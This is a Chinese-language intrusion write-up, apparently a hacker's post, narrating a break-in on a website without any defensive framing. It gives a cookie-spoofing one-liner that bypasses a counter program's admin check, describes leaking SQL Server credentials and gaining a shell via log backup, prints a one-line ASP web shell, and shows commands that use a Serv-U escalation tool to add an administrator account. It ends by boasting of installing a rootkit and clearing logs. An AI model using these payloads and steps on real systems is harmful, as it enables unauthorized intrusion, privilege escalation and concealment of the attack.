DB_OWNER权限，SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了)，开了3389（冲着它来的）
后台没什么功能，想放弃，可发现了下面的一幕
发现了一个计数器程序的readme
http://www.abc.com/count/readme.txt
有说明就好办，从网上下了个源程序来
发现漏洞文件count/admin.asp代码如下
_____________________________________________________________

<%
'******************************
'
'       飞越访客单用户统计系统
'    飞越    feiyueziwo@sohu.com
'         www.pwsite.net
'
'      版权所有: 动力在线
'
'******************************
%>
<%
response.write Request.Cookies(feiyue)("Username")
if Request.Cookies(feiyue)("Username")="" then
response.end
response.Redirect("login.asp?action=error")
end if%>
...........
_____________________________________________________________

cookies欺骗一句话就可以搞定
再IE里输入以下代码，再访问http://www.abc.com/count/admin.asp就是管理员了

javascript:document.cookie="feiyue=Username=cooldiyer";

后台没什么可利用，郁闷，数据库插马本机测试可以成功，可它网站的不行，压缩了数据库还不行，
后台不能上传文件，只一个备份数据库功能，利用这个功能把数据库连接文件给显示了出来，得到
SQL Server连接用户和密码，远程连接后备份数据库log得到一个shell
主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe
写了一句话木马如下:

<%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%>

执行：
http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add"
http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add"

成功！连其3389端口，安上rootkit，CA一个管理员，CleanLog，闪人.......